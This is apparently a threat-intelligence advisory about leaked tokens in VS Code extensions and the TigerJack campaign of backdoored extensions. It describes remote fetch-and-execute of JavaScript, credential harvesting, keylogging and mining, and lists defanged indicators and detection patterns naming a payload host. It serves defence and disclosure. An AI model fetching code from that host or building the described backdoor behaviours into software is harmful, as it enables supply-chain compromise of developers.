VS Code Extension Ecosystem Targeted by TigerJack and Mass Credential Exposure
October 24th, 2025
High
_edited.png)
Our Cyber Threat Intelligence Unit is monitoring two converging threats in the Visual Studio Code (VS Code) ecosystem: (1) widespread credential exposure in published extensions, and (2) a malicious extension campaign by TigerJack. In October 2025, Wiz, CSO Online, and The Hacker News reported that over 500 VS Code extensions contained 550+ secrets, including 100+ Marketplace Personal Access Tokens (PATs) and 30+ Open VSX tokens. These credentials, such as API keys, cloud secrets, and database access, could allow attackers to publish trojanized updates or fraudulent extensions, turning developer tools into malware channels. Meanwhile, TigerJack distributed backdoored extensions that perform malicious activities such as data exfiltration, keystroke logging, cryptocurrency mining, and remote payload retrieval. Despite takedown efforts, multiple TigerJack extensions reappeared on Open VSX and other registries, increasing exposure beyond Microsoft’s marketplace. This highlights the rising supply-chain risk and the need for improved token hygiene, extension governance, and endpoint visibility.
Technical Details
Attack Type: Supply-chain compromise via malicious or compromised extensions.
Severity: High.
Delivery Vectors:
Leaked tokens: Exposed PATs and API keys within .vsix packages allow adversaries to push modified updates to legitimate extensions or republish under existing publisher identities.
Malicious publishers: Threat actors upload malicious extensions to both VS Code Marketplace and Open VSX, performing code execution through dynamically fetched JavaScript or embedded eval() routines.
Techniques Observed:
Embedded secrets include OpenAI, Gemini, Anthropic, and Hugging Face API keys; cloud service credentials; and Marketplace/Open VSX PATs.
TigerJack extensions impersonate legitimate utilities (e.g., “C++ Playground,” “HTTP Format”) and implement:
Periodic remote JavaScript fetch-and-execute from ab498.pythonanywhere[.]com/static/in4.js every ~20 minutes.
Credential and source-code harvesting from local workspaces.
CoinIMP-based cryptocurrency mining and resource abuse.
Keystroke capture and event monitoring to exfiltrate developer input.
Cross-registry persistence: Extensions removed from Microsoft’s Marketplace were later re-uploaded to Open VSX or cloned under alternate publisher names, evading static reputation checks.
Vendor Mitigation: Microsoft revoked compromised PATs and deployed automated secret-scanning for all new and updated extensions (effective September 22, 2025).
Impact
A compromised Marketplace or Open VSX token enables malicious updates to automatically deploy to users with extension auto-update enabled, potentially converting a token leak into a mass compromise channel.
Stolen API keys and source code can result in intellectual-property theft, account takeover, or unauthorized cloud usage.
Malicious extensions inherit developer-level permissions, allowing local file exfiltration, backdoor injection, and internal network access via synced credentials.
Because these extensions often retain full functionality, they can remain installed and undetected for extended periods while periodically retrieving new malicious payloads.
Detection Method
Maintain a centralized inventory of all extensions in use and flag any with publisher metadata changes or unverified sources.
Perform static scanning of .vsix packages and unpacked extensions for embedded secrets (PATs, API keys, cloud credentials).
Monitor Code.exe and related processes for:
Outbound requests to pythonanywhere[.]com or dynamic JavaScript hosts every ~20 minutes.
Repeated use of eval() on fetched code.
File-read attempts in workspace directories or credential stores.
CPU spikes consistent with mining activity.
Correlate extension-update events with outbound connections or anomalous network activity from developer machines.
Indicators of Compromise
Type | Indicator | Description |
Domain | ab498.pythonanywhere[.]com | Observed remote fetch endpoint used by malicious VS Code extensions to retrieve remote code. |
Path | /static/in4.js | Used by TigerJack extensions to periodically fetch remote JS payloads (~20-minute intervals). |
Recommendations
Inventory and Freeze Extensions: Enumerate all extensions deployed across developer endpoints and CI runners; disable or remove unverified publishers.
Rotate All Leaked Secrets: Treat any exposed token as compromised and immediately rotate Marketplace/Open VSX PATs, AI provider keys, and cloud credentials.
Control Updates: Disable automatic extension updates in sensitive environments and require centralized approval for updates.
Enforce Extension Allowlists: Restrict installations to vetted publishers via managed policies (e.g., VS Code Settings Sync controls or enterprise policy JSONs).
Implement Secret Scanning: Integrate pre-deployment scanning to detect embedded keys in extensions, dependencies, or build artifacts.
Endpoint Monitoring: Hunt for outbound connections to known malicious hosts and unusual Code.exe process behaviour, including CPU anomalies or remote script fetches.
Source Control Hygiene: Periodically audit workspace files for injected scripts or modified JavaScript dependencies.
Conclusion
The combination of massive secret exposure and an active malicious extension campaign associated with Tigerjack represents a high-impact software-supply-chain threat to developer ecosystems. A single leaked PAT can enable an attacker to weaponize a trusted extension and distribute malware at scale. We urge organizations to catalogue extensions immediately, rotate tokens, and enforce extension governance across developer environments. Continuous monitoring for malicious network activity, coupled with pre-publish secret scanning, is essential to mitigate the downstream risk to code integrity and enterprise infrastructure.